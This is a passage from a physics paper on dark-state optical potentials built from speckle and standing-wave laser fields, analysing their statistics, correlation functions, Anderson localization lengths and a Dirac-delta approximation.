field with Rabi frequency \(\Omega(x)\), detuned by \(\Delta\) from the resonance creates the optical potential \[V_{sp}(x)=\hbar\frac{\Omega^{2}(x)}{4\Delta}. \tag{16}\] The Window function.-The formula (11) takes into account the window function \(w(\cdot)\) which can be used to tune the statistical properties of \(F(x)\). We consider windows of the form \[w(\rho)=\Theta(|\rho|-R/2+W)-\Theta(|\rho|-R/2) \tag{17}\] which form a double-slit system [35]. In the simplest case, \(W=R/2\), \(w(\rho)=1\) for \(|\rho|\leq R/2\). ## III The dark state potential The features of the dark state potential \(V_{D}(x)\) depend solely on those of the dark state \(|D(x)\rangle\), compare (6). In contrast to potentials created by AC-Stark shifts, tuning the laser intensity does not necessarily modify the amplitude of the potential. Scaling of all \(\Omega_{i}\) by a common factor leaves the dressed states and \(V_{D}(x)\) unaffected due to a functional form of \(|D(x)\rangle\) [see (2)]. The amplitude and shape of \(V_{D}(x)\) is rather controlled by relative magnitudes of the two Rabi frequencies \(\Omega_{1}(x)\) and \(\Omega_{2}(x)\), which prompts us to define the dimensionless parameter: \[\epsilon_{12}=\frac{\tilde{\Omega}_{1}}{\tilde{\Omega}_{2}}=\epsilon_{21}^{-1}, \tag{18}\] controlling that aspect of the setup. Obviously when in a specific situation roles of \(\Omega_{1}(x)\) and \(\Omega_{2}(x)\) are interchangeable, then configurations for \(\epsilon_{12}=\epsilon\) and \(\epsilon_{12}=\epsilon^{-1}\) are equivalent. From Eq. (6) one sees that potentials peaks in \(V_{D}(x)\) occur where \(|D(x)\rangle\) changes substantially over a short distance. This may occur e.g in those places where \(\Omega_{1}(x),\Omega_{2}(x)\) go from \(\Omega_{1}(x)\ll\Omega_{2}(x)\) to \(\Omega_{1}(x)\gg\Omega_{2}(x)\) regime or vice versa. To get more insight into the genesis and shape of \(V_{D}(x)\), we first look in more detail at two important special cases. First, when \(\Omega_{2}(x)\) is due to a speckle field and \(\Omega_{1}(x)\) is constant or slowly varying on a scale much larger than the wavelength of the speckle. The potential typically consists of double-peak structures that appear near minima of \(\Omega_{2}(x)\). This is discussed below in III.1 together with basic statistical properties of this potential. Secondly, we consider the case when \(\Omega_{1}(x)\) is due to a running wave, Eq. (9). Then \(V_{D}(x)\) has sharp potential peaks near zeros of \(\Omega_{1}\), where \(\Omega_{2}(x)\) may be considered constant locally. To randomize the heights of \(V_{D}(x)\) peaks, the \(\Omega_{2}(x)\) may come from a speckle field or a running wave, Eq. (15) with a wavelength incommensurate with the \(\Omega_{1}(x)\), creating a quasiperiodic pattern. ### The \(V_{d}(x)\) near finite minima of \(\Omega_{2}\) due to a speckle field The \(\Omega_{2}(x)\) coming from the speckle field does not feature exact zeros, but rather it has local minima. Consider a minimum of \(\Omega_{2}(x)\) at \(x=x_{0}\). For \(x\approx x_{0}\) we approximate \(\Omega_{2}(x)\) as: \[\Omega_{2}(x)\equiv\tilde{\Omega}_{2}\left[b+\frac{\kappa^{2}}{2}(x-x_{0})^{2} \right]. \tag{19}\] The part in bracket is a quadratic expansion of the function \(S_{2}(x)\) around a particular minimum. We do not include the value of \(b\) in \(\tilde{\Omega}_{2}\) as we assume that the \(\tilde{\Omega}_{2}\) is defined by Eq. (15) for a given realization of \(\Omega_{2}(x)\). We consider \(\Omega_{1}(x)=\tilde{\Omega}_{1}=\text{const.}\) and \(|\Omega_{2}(x_{0})|\ll\tilde{\Omega}_{1}\). Under these assumptions, the dark state potential \(V_{D}(x)\) reveals, locally, a double peak structure (see Fig. 2a). Analytically, we have (see [34]): \[V_{D}(x)=\frac{\hbar^{2}\kappa^{2}}{2m}\frac{\epsilon_{12}^{2}\kappa^{2}(x-x_ {0})^{2}}{\left[b+\frac{\kappa^{2}}{2}(x-x_{0})^{2}\right]^{2}+\epsilon_{12}^ {2}\right]^{2}}, \tag{20}\] where \(\epsilon_{12}\) is given by Eq. (18). The value of this parameter depends only on amplitudes of the Rabi frequencies, and is the same for different minima of a single realization of \(\tilde{\Omega}_{1}(x)\). For arbitrary \(\epsilon_{12},b\) the width of this structure is \[\Delta x(b,\epsilon_{12},\kappa)=2\kappa^{-1}\sqrt{\frac{2}{3}}\sqrt{\sqrt{4b ^{2}+3\epsilon_{12}^{2}-b}} \tag{21}\] and its height is \[V_{\text{max}}(b,\epsilon_{12},\kappa)=\frac{\hbar^{2}\kappa^{2}}{2m}\frac{27 \epsilon_{12}^{2}\left(\sqrt{4b^{2}+3\epsilon_{12}^{2}}-b\right)}{8\left(b \left(\sqrt{4b^{2}+3\epsilon_{12}^{2}}+2b\right)+3\epsilon_{12}^{2}\right)^{2 }}. \tag{22}\] For \(\epsilon_{12}\gg b\) the width: \[\Delta x(b,\epsilon_{12},\kappa)\rightarrow\frac{\sqrt{8\epsilon_{12}}}{\sqrt {3}}\kappa^{-1}, \tag{23}\] and the height : \[V_{\text{max}}(b,\epsilon_{12},\kappa)\rightarrow\frac{3\sqrt{3}}{8\epsilon_{ 12}}\frac{\hbar^{2}\kappa^{2}}{2m}. \tag{24}\] If additionally \(\epsilon_{12}\to 0\) the two potential peaks converge to \(\frac{\pi}{2\sqrt{\epsilon_{12}}}\delta(x-x_{0})\). For \(b\gg\epsilon_{12}\) the width is \[\Delta x(b,\epsilon_{12},\kappa)\to 2k^{-1}\sqrt{\frac{2}{3}}b, \tag{25}\] and the height of both peaks is \[V_{\text{max}}(b,\epsilon_{12},\kappa)\rightarrow\frac{27\epsilon_{12}^{2}}{12 8b^{3}}\frac{\hbar^{2}\kappa^{2}}{2m}. \tag{26}\] The Figure 2c) shows the exemplary dark state potentials obtained for \(\Omega_{2}(x)\) equal to the speckle shown in Fig. 2b) with a black line, while \(\Omega_{1}\) remains position independent. The plot shows two cases \(\epsilon_{12}=1\) and \(\epsilon_{12}=0.2\) with relative peak heights following (24) and (26). For fixed \(\epsilon_{12}\) we may ascribe the value of parameter \(b_{i}\) from Eq. (19) to each of the minima of \(\Omega_{2}(x)\) at \(x_{i}\), indexed by \(i\). If the value of \(\epsilon_{12}\) is lowered, potential peaks for which \(\epsilon_{12}\gg b_{i}\) are made higher and narrower, but those that already passed to the opposite \(\epsilon_{12}\ll b_{i}\) regime have their height further reduced (see Eq. (26)). Decrease of \(\epsilon_{12}\) results in fewer sharp peaks in \(V_{D}(x)\) but height of some of those peaks can increase. Similar observations may be made in the case when \(\Omega_{1}(x)\) is not constant but is due to a speckle field itself. Figure 2d) shows the corresponding exemplary potential for same \(\Omega_{2}(x)\) as in Fig. 2c) and \(\Omega_{1}(x)\) given by the Figure 2: Panel a): shape of double peak structure of \(V_{D}(x)\) potential for the 3-level \(\Lambda\) system near quadratic minimum of \(\Omega_{2}(x)\) – Eq. (19). To reach a substantial peak height, one needs \(b\ll\epsilon_{12}\ll 1\). Panel b) shows two exemplary realizations of the speckle shape functions \(S_{i}(x)\). Panels c) and d) show the dark state potential \(V_{D}(x)\) when \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)\). Panel c) is for a constant \(\Omega_{1}(x)=\tilde{\Omega}_{1}\) while in panel d) \(\Omega_{1}(x)=\tilde{\Omega}_{1}S_{1}(x)\). The relative strengths of \(\Omega_{1}(x)\) and \(\Omega_{2}(x)\) are indicated in the legends. red curve in Fig. 2b). Most of the potential peaks occur where one of \(\Omega_{1}(x)\), \(\Omega_{2}(x)\) has a minimum and the other may be considered approximately constant. Similarly one can use Eq. (19) applied to \(\Omega_{1}(x)\) or \(\Omega_{2}(x)\) and ascribe \(b_{i}\)'s to each minimum. Since now \(\Omega_{1}(x)\) is position dependent, in order to characterize individual peaks near minima of \(\Omega_{2}(x)\) via (20) we have to substitute \(\epsilon_{12}\to\epsilon_{12,i}\) where \[\epsilon_{12,i}=\frac{\tilde{\Omega}_{1}S_{1}(x_{i})}{\tilde{\Omega}_{2}}, \tag{27}\] with \(\epsilon_{12,i}\) specific for each minimum. In case of the minima of \(\Omega_{1}\), we consider \(\epsilon_{21,i}\) defined as above with swapped \(\Omega_{1}\) and \(\Omega_{2}\). Let us consider reducing the amplitude \(\tilde{\Omega}_{1}\). As \(\epsilon_{12,i}\sim\tilde{\Omega}_{1}\), the discussion of regimes \(\epsilon_{12,i}\ll b_{i}\) vs \(\epsilon_{12,i}\gg b_{i}\) carried out for constant \(\Omega_{1}(x)\) still applies. The potential peaks near the minima of \(\Omega_{1}(x)\) are characterized by \(\epsilon_{21,i}\sim\tilde{\Omega}_{1}^{-1}\). Thus for smaller and smaller \(\tilde{\Omega}_{1}\) height of the latter family of peaks is reduced as well. Let us now see how the above observations manifest in statistical properties of the potential \(V_{D}(x)\). Figure 3 presents \(\bar{V}_{D}\) - the mean, and \(\bar{\Delta}V_{D}\) - the standard deviation of \(V_{D}(x)\) as a function of \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\) for the case of constant \(\Omega_{1}(x)=\tilde{\Omega}_{1}\) (panel a) and for the case when \(\Omega_{1}(x)=\tilde{\Omega}_{1}S_{1}(x)\) (panel b). In the latter there is an obvious symmetry \((\tilde{\Omega}_{1},\tilde{\Omega}_{2})\to(\tilde{\Omega}_{2},\tilde{\Omega}_ {1})\). In both cases for \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}<1\), as this ratio decreases, the standard deviation of \(V_{D}(x)\) grows, and mean \(\bar{V}_{D}\) converges to a constant. This is consistent with increasingly more sparse minima satisfying \(b_{i}\ll\epsilon_{12}\) (or \(b_{i}\ll\epsilon_{12,i}\) for panel b) ). For large values of \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\), in case of constant \(\Omega_{1}(x)=\tilde{\Omega}_{1}\gg\Omega_{2}(x)\), we approximately have: \[|D(x)\rangle\approx-\frac{\Omega_{2}(x)}{\tilde{\Omega}_{1}}|1\rangle+|2\rangle, \tag{28}\] and: \[V_{D}(x)\approx\frac{\Omega_{2}^{\prime}(x)^{2}}{\tilde{\Omega}_{1}^{2}}=(S_{ 2}^{\prime}(x))^{2}\epsilon_{12}^{-2}. \tag{29}\] This means that both the mean height \(\bar{V}_{D}\) and the standard deviation \(\bar{\Delta}V_{D}\) decrease to \(0\), for increasing \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\). Their ratio \(\bar{\Delta}V_{D}/\bar{V}_{D}\to 1.32\pm 0.02\) as seen in Fig. 3a). This limit is larger than the \(\bar{\Delta}V_{sp}/\bar{V}_{sp}\to 1\) for the far-detuned AC-Stark optical potential \(V_{sp}(x)\) created by laser speckle, in a standard optical lattice setting where \(V_{sp}(x)\sim\Omega_{1}^{2}(x)/(4\delta)\) (with \(\delta\) the detuning from the resonance). In the situation when both \(\Omega_{1}(x)\) and \(\Omega_{2}(x)\) are due to speckle fields, the standard deviation \(\tilde{\Delta}V_{D}\) decreases towards a minimum at exactly \(\tilde{\Omega}_{1}=\tilde{\Omega}_{2}\). For both \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\to 0\) and \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\to\infty\) the behaviour of \(\bar{\Delta}V_{D}\) is similar to the case of constant \(\Omega_{1}(x)\). The marked difference is that \(\bar{V}_{D}\) is \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\)-independent. Qualitatively speaking, this is because change of \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\) has the opposite effect on potential peaks near minima of \(\Omega_{2}(x)\) and \(\Omega_{1}(x)\) when it comes to their height and width. In Fig. 3 we mark with the dashed lines results for two cases discussed above when the obstacle is put onto the diffusive plate. We chose to illustrate this by setting the parameter \(W=R/5\), in Eq. (11) (note that the case \(W=R/2\) corresponds to no obstacle). The obstacle suppresses low frequencies from the Fourier expansion of the \(F(x)\) and the resulting potential \(V_{D}(x)\) has higher mean and variance. ### The dark state potential near zeros of \(\Omega_{i}\)'s Let us now consider the situation when \(\Omega_{1}(x)\) posses a zero over the real axis at \(x=x_{i}\), as in, e.g., the case of \(\Omega_{1}(x)\) being due to a standing wave, Eq. (9). We assume \(\Omega_{2}(x)\) to be locally constant \(\Omega_{2}(x)\approx\tilde{\Omega}_{2,i}\) near \(x_{i}\). This creates the setting similar to the dark state lattice proposal [24]. We then linearize \[\Omega_{1}(x)\approx\tilde{\Omega}_{1}k_{1}(x-x_{0}), \tag{30}\] which gives \(V_{D}(x)\) of the form: \[V_{D}(x)\approx\frac{\epsilon_{21,i}^{2}E_{r}}{[k_{1}^{2}(x-x_{0})^{2}+\epsilon_{ 21,i}^{2}]^{2}} \tag{31}\] It describes a peak of width \(\sim\epsilon_{21,i}\lambda_{1}\) and height \(\epsilon_{21,i}^{-2}E_{r}\) with \(\epsilon_{21,i}=\tilde{\Omega}_{2,i}/\tilde{\Omega}_{1}\) (see Fig. 4a). In the limit \(\epsilon_{21,i}\to 0\) each of the potential peaks converges to \(\frac{\pi}{2\epsilon_{21,i}}\delta(x-x_{0})\). If \(\Omega_{2}(x)\) were truly constant, the subsequent peaks would create a lattice of narrow peaks of identical shape and height, just as in [24]. To randomize them, we use pseudorandom \(\Omega_{2}(x)\). We discuss two possibilities. One option is to choose \(\Omega_{2}(x)\) as in Eq. (9) with \(k_{1}/k_{2}\neq\mathbb{Q}\). In that case for different \(x_{i}\) such that \(\Omega_{1}(x_{i})=0\) we have \(\epsilon_{21,i}\) that vary between \(\epsilon_{-}=\max(0,[-\tilde{\Omega}_{2}+\tilde{\Omega}_{2}^{0}]/\tilde{ \Omega}_{1})\) and \(\epsilon_{+}=[\tilde{\Omega}_{2}+\tilde{\Omega}_{2}^{0}]/\tilde{\Omega}_{1}\). This translates into pseudo-random height and width of subsequent peaks of \(V_{D}(x)\) determined by subsequent \(\epsilon_{21,i}\)'s. The resulting potential consisting of equidistant pseudo-random peaks is shown in Fig. 4b) for \(\epsilon_{+}=0.15\) and \(\epsilon_{-}=0.1\). The expressions for \(\epsilon_{-}\), \(\epsilon_{+}\) show that one can control the amplitude of the disorder simply by changing \(\tilde{\Omega}_{2}\), \(\tilde{\Omega}_{2}^{0}\) and \(\tilde{\Omega}_{1}\) One should note that, in general, there are additional potential peaks near minima of \(\Omega_{2}(x)\) at points designed \(x_{i}^{\prime}\). Such peaks are described by Eq. (31) or Eq. (20) with values of \(\epsilon_{12,i}=\Omega_{1}(x_{i}^{\prime})/\Omega_{2}(x_{i}^{\prime})\) for \(x_{i}^{\prime}\) far from any \(x_{j}\) we have \(\epsilon_{12,i}\gg\) and for \(x_{i}^{\prime}\) equal to some \(x_{j}\) the potential peak is mainly due to zero of \(\Omega_{1}(x)\). These peaks are automatically included in the numerical treatment of the model that takes exact value of \(V_{D}(x)\). One can make similar construction with \(\Omega_{2}(x)\) due to a speckle field, Eq. (15). In contrast to the sine function case, the \(S_{2}\) in Eq. (15) is strictly limited only from below (by zero). The probability for taking the value above \(2\) is nevertheless exponentially suppressed. This means that for most \(\epsilon_{i}\) characterizing individual peaks, we have \(\epsilon_{i}\in[\epsilon_{-},\epsilon_{+}]\) where \(\epsilon_{-}=\max(0,[-2\tilde{\Omega}_{2}+\tilde{\Omega}_{2}^{0}]/\tilde{ \Omega}_{1})\) and \(\epsilon_{+}=[2\tilde{\Omega}_{2}+\tilde{\Omega}_{2}^{0}]/\tilde{\Omega}_{1}\). The resulting potential \(V_{D}(x)\) is shown in Fig. (4c) for \(\epsilon_{+}=0.15\) and \(\epsilon_{-}=0.1\). In broad terms it is similar to the previously considered \(\Omega_{2}(x)\) as in Eq. (9), but differs in statistical properties of peak heights. This is discussed further in Section V where we calculate tight-binding parameters for movement in this kind of random potential. ## IV Localization In the case when \(\Omega_{1}(x)=\text{const.}\) and \(\Omega_{2}(x)=S_{2}(x)\tilde{\Omega}_{2}\) the \(V_{D}(x)\) consists of relatively narrow random double peaks. In this settings it is natural to consider Anderson localization which has been traditionally studied in the optical potential created by a speckle field via AC-Stark effect. To that end we first discuss the two-point correlation function of the \(V_{D}(x)\) potential in such a case. ### Correlation functions Let us consider two point correlation function \[C_{2}(\delta x)=\overline{V(x)V(x+\delta x)}.\] For random potentials it is directly related to the so-called Anderson localization length, \(L_{\text{loc}}\) of the eigenstates [35; 36]. Generically in one-dimensional systems with a random potential \(V(x)\), \[H = -\frac{\hbar^{2}}{2m}\frac{d^{2}}{dx^{2}}+V(x), \tag{32}\] one expects [3; 36] that eigenstates \(\psi_{i}(x)\) are exponentially localized: \[|\psi_{i}(x)|\ \sim\ \exp[-|x|/L_{\rm loc}(E)]. \tag{33}\] The \(E\) in \(L_{\rm loc}(E)\) is the energy of \(\psi_{i}\). Often \(L_{\rm loc}(E)\) quickly grows with \(E\). The localization length may be related to the correlation function via a series expansion with respect to increasing powers of \((\bar{\Delta}V/\sqrt{E_{\sigma_{R}}(E-\bar{V})})^{1/2}\), where \(\bar{V},\bar{\Delta}V\) are the mean and standard deviation of \(V(x)\). Specifically: \[L_{\rm loc}^{-1}(E-\bar{V})=\sum_{n\geq 2}\gamma^{(n)}(E-\bar{V}). \tag{34}\] The lowest term \(\gamma^{(2)}\) is given by \[\gamma^{(2)}(E-\bar{V})=\frac{m}{4\hbar^{2}(E-\bar{V})}\tilde{C}_{2}\left[2 \sqrt{\frac{2m(E-\bar{V})}{\hbar^{2}}}\right]. \tag{35}\] Higher order terms contain multi-point correlation functions, beyond two-point \(C_{2}\). The expansion holds for a small \(\bar{\Delta}V\). The other cases can be handled by numerical determination of \(L_{\rm loc}^{-1}\). For the speckle optical potential, \(V_{sp}(x)\), with a constant window function \(W=R/2\), the correlation function is: \[C_{2}(\delta r)=\overline{V_{sp}}^{2}\left\{1+\left[\frac{\sin(x/\sigma_{R})} {x/\sigma_{R}}\right]^{2}\right\}, \tag{36}\] and its Fourier transform (see Fig. 5a): \[\tilde{C}_{2}(k)=\overline{V_{sp}}^{-2}\left\{2\pi\frac{\delta(k)}{\sigma_{R} }+\pi\max\left(0,1-\frac{|k|\sigma_{R}}{2}\right)\right\}. \tag{37}\] It is important to note that for \(|k|\geq k_{0}=\frac{2}{\sigma_{R}}\ \tilde{C}_{2}(k)\) vanishes [36; 37]. This implies significantly longer localization lengths for energies \(E\) above \(\bar{V}+E_{0},\ E_{0}=\frac{\hbar^{2}k_{0}^{2}}{2m}\). This is because the value of \(L_{\rm loc}\) is solely due to higher order terms in the expansion (34). The insertion of the obstacle in the optical system, that amounts to \(W\neq R/2\) in (17), has a profound impact on the correlation function \(\tilde{C}_{2}(k)\). For \(W\leq D/3\) the \(\tilde{C}_{2}(k)\) vanishes not only for \(|k|\geq k_{0}\) but also for some intermediate values of \(|k|\) within the interval \([0,k_{0}]\) as well. This is illustrated for \(W=D/5\) in Fig. 5a). Consider now the dark state potentials \(V_{D}(x)\) as in the preceding section, for the case when \(\Omega_{1}(x)=\tilde{\Omega}_{1}\) and \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x).\) For such a configuration the correlation functions \(C_{2}\) and \(\tilde{C}_{2}\) are shown the Fig. 5b) and Fig. 5c). Contrary to the \(V_{sp}\) potential case, here \(\tilde{C}_{2}(k)\) is non-zero for large values of momenta, \(k\). This corresponds, in the position space, to the shape of \(C_{2}\) shown in Fig. 5c) where the dark-state \(C_{2}(x)\) features a narrow peak. These statements hold for both \(W=R/2\) and \(W=R/5\). In the latter case, when the obstacle is put in front of the diffusive plate, the strong modulation of \(\tilde{C}_{2}(x)\) occurs. Let us track the reason why high Fourier components \(\tilde{C}_{2}\) behave differently for \(V_{sp}\) and \(V_{D}(x)\). The speckle potential \(V_{sp}(x)\) is proportional to the square of the Rabi frequency \(\Omega(x)\), as in Eq. (16). Taking the square at most doubles the extent of \(k\) that index non-zero Fourier components of \(V_{sp}\). This allows \(\tilde{C}_{2}(k)=0,\ k\geq k_{0}\). In Figure 5: Panel (a) shows \(\tilde{C}_{2}\) for the speckle potential \(V_{sp}\) for \(W=D/2\) (solid line), \(W=D/5\) (dashed line). Panel (b) same as above for the dark state \(V_{D}(x)\) potential with \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)\) – a speckle field) for \(\tilde{\Omega}_{2}/\tilde{\Omega}_{1}=0.1\) and \(W=D/2\) (solid line), \(W=D/5\) (dashed line). The dashed-dotted line shows data for \(\tilde{\Omega}_{2}/\tilde{\Omega}_{1}=0.3\) and \(W=D/2\). Panel (c) shows the spatial correlation function \(C_{2}(x)\) for all of the above potentials with matching colors. In all of the above the normalization of the plot has been chosen so that the maximal value of each line is \(1\). the case of the dark state potential, the highly nonlinear dependence of \(V_{D}(x)\) on \(\Omega_{i}(x)\)'s in Eq. (11) produces arbitrarily large Fourier components in \(V_{D}(x)\) and there is no reason for \(\tilde{C}_{2}(k)\) to vanish for large \(k\). This is a manifestation of the origin of the dark state potential coming from position-dependent dark state in contrast to the conventional AC-Stark shift. Another feature worth pointing out is that by changing the ratio \(\tilde{\Omega}_{2}/\tilde{\Omega}_{1}\) one controls the shape of the potential as proven by manifestly different \(\tilde{C}_{2}\) for \(\tilde{\Omega}_{2}/\tilde{\Omega}_{1}\) set to two exemplary values of \(0.1\) and \(0.3\). In case of the speckle potential change of \(\Omega(x)\) changes the constant factor in \(\tilde{C}_{2}(x)\), but keeps the overall shape of \(\tilde{C}_{2}\) from Fig. 5a). ### Anderson localization in a dark state potential To quantitatively analyze the physical implications of a particular form of \(\tilde{C}_{2}\), we simulate the Anderson localization of a particle moving in \(V_{D},V_{sp}.\) Specifically, we look for eigenstates of Hamiltonian (32) at energy \(E\) such that \(\hbar^{2}k^{2}=2m(E-\bar{V})\). The resulting Schrodinger equation is solved over an interval \(x\in[0,L]\) with the condition \(\psi(x)\to e^{-ikx},x\to 0+\). This is the outgoing amplitude of a particle that has entered the sample at \(x=L\). Near \(x=L\) the wavefunction has the incoming and reflected components \(\psi(x\to L)=Ae^{-ikx}+Be^{ikx}\) proportional to \(A\) and \(B\) respectively. The values of \(A\), \(B\) are determined numerically. We define the localization length \(L_{\rm loc}\) by the condition \[\langle\log|A|\rangle\ \to\ L/L_{\rm loc},\quad L\to\infty, \tag{38}\] where \(\langle\cdot\rangle\) denotes averaging over disorder realizations. Figure 6 shows \(L_{\rm loc}\) for large \(L=5\times 10^{4}\sigma_{R}\), and \(10^{4}\) disorder realizations. Let us focus on the black dashed curve corresponding to \(\sigma_{R}/L_{\rm loc}\) for \(V_{sp}\) with shallow \(\bar{V}_{sp}=\bar{\Delta}V_{sp}=0.04E_{\sigma_{R}}.\) Its dependence on \(k\) shows a kink at \(k=k_{0}\) such that \(k_{0}\sigma_{R}=1\). By Eq. (35) this corresponds to a transition from \(\tilde{C}_{2}\neq 0\) for \(k\leq 2k_{0}\) to \(\tilde{C}_{2}=0\) for \(k\geq 2k_{0}\). The kink is followed by a sudden increase of \(L_{\rm loc}\) as first observed in [36]. We now show \(\sigma_{R}/L_{\rm loc}\) computed numerically for the dark state potential \(V_{D}.\) We focus on the case where \(\Omega_{1}(x)=\tilde{\Omega}_{1}\) and \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)\) and present it in the same Fig. 6a). We chose the value of \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\approx 2.357\) to ensure that \(\bar{\Delta}V_{D}=\bar{\Delta}V_{sp}=0.04E_{\sigma_{R}}\). One sees that for low momenta, smaller than the threshold value set by \(k_{0}\), the localization length is similar to that for the speckle potential. At \(k_{0}\) both potentials feature a kink. For such a small potential variance, the main contribution to the correlation length comes from \(\gamma^{(2)}(k_{0})\). It is proportional to \(\tilde{C}_{2}(2k_{0})\). For \(k>k_{0}\)\(\tilde{C}_{2}(k)=0\) for the the speckle potential while for the dark state potential a notable kink in \(\tilde{C}_{2}\) at \(k_{0}\) remains. The main difference comes for \(k\sigma_{R}\geq k_{0}\sigma_{R}\) where the localization is strongly suppressed in the speckle potential but not in the dark state potential \(V_{D}\), again easily explained by properties of \(\tilde{C}_{2}\). Thus the non-linear dependence of the potential \(V_{D}\) on \(\Omega\)'s translated directly to an observable much stronger localization for large particle energies. For a sufficiently large amplitude of the disordered potential, the \(\gamma^{(2)}\) term is no longer a dominant contribution to the inverse localization length. This is evident in Fig. 5a) where \(\bar{\Delta}V_{D}=\bar{\Delta}V_{sp}=0.5E_{\sigma_{R}}\). The kink at \(k_{0}\) no longer can be observed in the dependence of \(\sigma_{R}/L_{\rm loc}\) on \(k\sigma_{R}\) for both \(V_{sp}\) and \(V_{D}\), and the localization length is strongly decreased. Still for large momenta the localization is much stronger in the non-linear dark state potential. When a non-trivial window function is used, the correlation function \(\tilde{C}_{2}\) for the \(V_{D}\) potential, for increasing \(k\sigma_{R}\) shows oscillations as in Fig. 5b). These oscillations find their way to the dependence of \(\sigma_{R}/L_{\rm loc}\) on the free momentum of the wave-function [see Fig. (6)b)]. Figure 6: Localization lengths \(L_{\rm loc}\) for various considered potentials. Panel a) compares the localization length in a speckle potential (dashed lines) and \(V_{D}\) potential for the \(\Lambda\) system with \(\Omega_{1}(x)=\tilde{\Omega}_{1},\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)\). For the speckle field we show two cases \(\bar{V}=\bar{\Delta}V=0.04E_{\sigma_{R}},0.5E_{\sigma_{R}}\) respectively with black dashed and blue dashed lines. Dark state potential \(V_{D}(x)\) for matching \(\bar{\Delta}V\) is shown with same colors and solid line. Respectively \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}=\epsilon_{12}=2.357\) (black) and \(\epsilon_{12}=0.333\) (blue). Panel b) shows the effect of putting the obstacle in optical paths. The solid lines show \(\sigma_{R}/L_{\rm loc}\) for \(W=R/2\) (lines repeated from a) for easing the comparison) and \(W=R/5\) (dashed lines). The \(\epsilon_{12}=2.357\) and \(3.398\) ensure \(\bar{\Delta}V=0.04E_{\sigma_{R}}\) for the \(V_{D}(x)\) potential for \(W=R/2\) and \(W=R/5\) respectively. ### Dirac Delta approximation In this Section we determine if localization in the dark state potential \(V_{D}\) may be approximately described using a potential consisting of series of Dirac-delta peaks (Kronig-Penney model), \(V_{\delta,D}(x)\): \[H=\frac{p^{2}}{2m}+\underbrace{\sum_{n}V_{n}\delta(x-x_{n})}_{V_{\delta,D}(x)}. \tag{39}\] Specifically, we compare the Anderson localization length for both \(V_{D}\) and \(V_{\delta,D}\). To choose \(V_{n}\) and \(x_{n}\) for a particular potential realization of \(V_{D}(x)\) and obtain the approximate \(V_{\delta,D}(x)\), we define a sequence of intervals \(I_{n}=(a_{n},b_{n})\subset\mathbb{R}\) such that: 1. \(V(x)\) has at least one local maximum in \(I_{n}\), 2. \(V(a_{n}),V(b_{n})\leq\delta\max_{x\in I_{n}}V(x)\) for \(\delta\) being a small positive real number, 3. no sub-interval contained in \(I_{n}\) satisfies the above. Intuitively, we want each intervals to contain a large portion of a single potential peak. The small value of \(\delta\) ensures that the \(V(x)\) is small outside of each interval \(I_{n}\) with respect to the maximum value. On the other hand \(\delta\) should not be chosen too small as it would lead to too large \(I_{n}\) encompassing more than one peak. We opt to choose \(\delta=0.25\). The above definition does not automatically imply that different intervals are disjoint. To ensure that, we actually find \(I_{n}\) in the following way: 1. For numerics we consider a particular realization over a finite interval \(x\in[0,L]\). 2. We store all local maxima of \(V(x),\;x\in[0,L]\) in the decreasing order with respect to their value, 3. We find the interval \(I_{1}\) encompassing largest maximum that satisfies (A)-(C), 4. After first \(n\) of intervals \(I_{n}\) are determined, the (A)-(C) define a candidate for the next interval \(I^{\prime}_{n+1}\). The set \(I_{n+1}:=I^{\prime}_{n+1}\setminus\bigcup_{i=1}^{n}I_{i}\) is an interval. If it is empty then it is not added to the \(I_{n}\) sequence. Each \(I_{n}\) allows us to define an effective peak height \[V_{n}=\int_{I_{n}}V(x)\mathrm{d}x, \tag{40}\] and position \[x_{n}=\frac{1}{V_{n}}\int_{I_{n}}xV(x)\mathrm{d}x. \tag{41}\] Let us note that it is possible that two very close maxima, for which \(V(x)\) does not fall below the threshold defined by the \(\delta\) will be approximated by a single Dirac Delta. Localization length calculationWe have performed the transfer-matrix calculation of \(\sigma_{R}/L_{\mathrm{loc}}\) for potentials \(V_{\delta,sp}\) and \(V_{\delta,D}\) the Dirac-delta approximations of the potentials \(V_{sp}\) and \(V_{D}\) respectively. We focus on two cases where the disorder of the potential is \(0.04E_{\sigma_{R}}\) or \(0.5E_{\sigma_{R}}\). When generating potentials \(V_{\delta,sp}\) and \(V_{\delta,D}\) we assume that it is the variance of the potential being approximated that is equal to one of the above values. For the case of low variance of the potentials \(0.04E_{\sigma_{R}}\) the inverse localization lengths is shown in Fig. 7a). For small \(k\sigma_{R}\) the inverse localization lengths in all four cases are similar. This is because, for shallow disorder the series expansion given by (34) holds and \(\sigma_{R}/L_{\mathrm{loc}}\) is determined by the variance of the potential that closely match. For \(k\sigma_{R}\) near 1, we observe "kinks" in the dependence of \(\sigma/L_{\mathrm{loc}}\) on \(k\sigma_{R}\). In case of the speckle potential this is followed by a sudden drop of \(\sigma_{R}/L_{\mathrm{loc}}\). This is in a stark contrast to the Dirac-delta approximation of the speckle potential \(V_{\delta,sp}\) (and \(V_{\delta,D}\)). This is not surprising as the speckle potential is smooth and Fourier transform of its correlation function has finite support. We saw in previous sections that for dark state potentials the \(\tilde{C}_{2}\) contained arbitrarily high nonzero Fourier components explaining why \(\sigma_{R}/L_{\text{loc}}\) for \(V_{D}\) and \(V_{\delta,D}\) are closer than for \(V_{sp}\) and \(V_{\delta,sp}\). The agreement of \(\sigma_{R}/L_{\text{loc}}\) for \(V_{\delta,D}\) of \(V_{D}\) may be regarded as at most qualitative for \(k\sigma_{R}\). Still the Dirac-delta approximation of \(V_{D}\) reproduces the fine details of the dependence of \(\sigma_{R}/L_{\text{loc}}\) on \(k\sigma_{R}\) such as the kink at \(k\sigma_{R}=1\). For the deeper disorder with potential variance of \(0.5E_{\sigma_{R}}\), we see in Fig. 7b) that the \(\sigma_{R}/L_{\text{loc}}\) 